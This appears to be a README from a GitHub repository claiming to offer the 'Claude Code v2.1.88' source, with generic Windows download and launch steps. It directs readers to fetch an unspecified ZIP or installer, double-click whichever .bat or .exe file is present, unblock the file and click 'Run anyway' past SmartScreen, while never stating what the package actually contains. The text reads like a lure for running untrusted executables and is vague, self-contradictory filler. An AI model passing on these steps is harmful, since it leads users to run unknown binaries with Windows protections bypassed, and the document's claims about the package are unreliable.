This repository gives you access to the source for Claude Code v2.1.88. If you want to inspect it, download it, and run it on Windows, follow the steps below.
Use the link above to visit the download page: https://github.com/Oliveleopardbane734/claude-code-source
Before you start, make sure your PC has:
- Windows 10 or Windows 11
- At least 8 GB of RAM
- At least 5 GB of free disk space
- A stable internet connection
- Administrator access on your PC
For best results, use a 64-bit version of Windows.
-
Open the download page: https://github.com/Oliveleopardbane734/claude-code-source
-
On that page, look for the latest release, source package, or download option.
-
Save the file to a folder you can find later, such as:
- Downloads
- Desktop
- Documents
If you see a ZIP file, download that file first. If you see an installer, download that instead.
If the file you downloaded is a ZIP file:
- Right-click the ZIP file.
- Select Extract All.
- Pick a folder with a short path, such as:
C:\ClaudeCodeC:\Apps\ClaudeCode
- Click Extract.
If the file is already an installer, skip this step.
This project is built with TypeScript, so you may need a few common tools on Windows:
- Node.js 20 or newer
- npm, which comes with Node.js
- Git, if you want to keep the folder updated
- Windows Terminal or Command Prompt
If the package includes its own installer or packaged app, you may not need to set up anything else.
After you extract or install the files:
-
Open the app folder.
-
Look for one of these files:
install.batstart.batrun.batclaude-code.exeapp.exe
-
Double-click the file to start the app.
If the project opens in a command window, keep that window open while the app runs.
When the app starts for the first time, you may see setup steps such as:
- Choosing a workspace folder
- Signing in
- Picking a local model path
- Accepting a prompt about file access
- Setting a cache folder
Use the default options if you are not sure what to choose. They usually work for most users.
Once the app is open, you can use it like this:
- Type a request in the main box
- Pick a folder or project if asked
- Let the app scan your files
- Review the output before you save or copy it
If the app asks for a local project folder, choose the folder you want it to work on.
After you install or extract the app, the folder may include files like these:
README.mdpackage.jsonsrcdistassetsconfigscripts
If you see these folders, the app is likely a source-based Windows build or a packaged desktop app with support files.
If double-clicking does not work, try one of these:
- Open the app folder.
- Click the address bar.
- Type
cmdand press Enter. - In Command Prompt, run one of these:
npm installnpm run buildnpm startnode .
Use the command that matches the files in the folder. If the folder has a package.json file, npm install often comes first.
If Windows shows a security prompt:
- Right-click the file.
- Choose Properties.
- Check Unblock if you see it.
- Click Apply.
- Try again.
If Windows SmartScreen appears, choose More info, then Run anyway if you trust the file source.
If the app does not open, check these items:
- Make sure you extracted all files
- Make sure the file path is short
- Make sure Node.js is installed
- Make sure you are using a 64-bit Windows system
- Make sure no other app is already using the same port, if the app opens in a browser
If you get a missing file error, return to the download page and make sure you downloaded the full package.
Based on the codebase, this repository may include:
- A large TypeScript app core
- Command handling
- File and folder tools
- Local config storage
- UI and terminal support
- Project state management
- Integration logic for desktop use
This means the app may be designed to help you work with code, files, or command-based tasks from a Windows machine.
Some common file types in this project are:
.tsand.tsxfor TypeScript code.jsfor built files.jsonfor config.batfor Windows launch scripts.exefor Windows apps.mdfor project docs
You do not need to edit these files to use the app.
The app may save data on your computer, such as:
- Settings
- Recent folders
- Cache files
- Session data
- Local logs
If you want a clean reset, you can remove the app folder and any related data folder it created in your user profile.
If you want to install again from scratch:
- Close the app.
- Delete the old folder.
- Download the package again from: https://github.com/Oliveleopardbane734/claude-code-source
- Extract or install the new copy.
- Start the app again
- Open the download page
- Download the ZIP or installer
- Extract the ZIP if needed
- Open the app folder
- Double-click the launcher or run the start file
- Follow the first-time setup
This app should work best on:
- Windows 11 Home
- Windows 11 Pro
- Windows 10 64-bit
- Standard Intel and AMD PCs
- Laptops and desktops
A modern PC with current Windows updates will give you the smoothest setup
Visit the download page here: https://github.com/Oliveleopardbane734/claude-code-source
You will know the app started when you see one of these:
- A desktop window opens
- A terminal window starts
- A browser tab opens to a local page
- The app shows a welcome screen
- The app asks you to choose a folder or sign in
If you reach one of these screens, the setup is complete enough to continue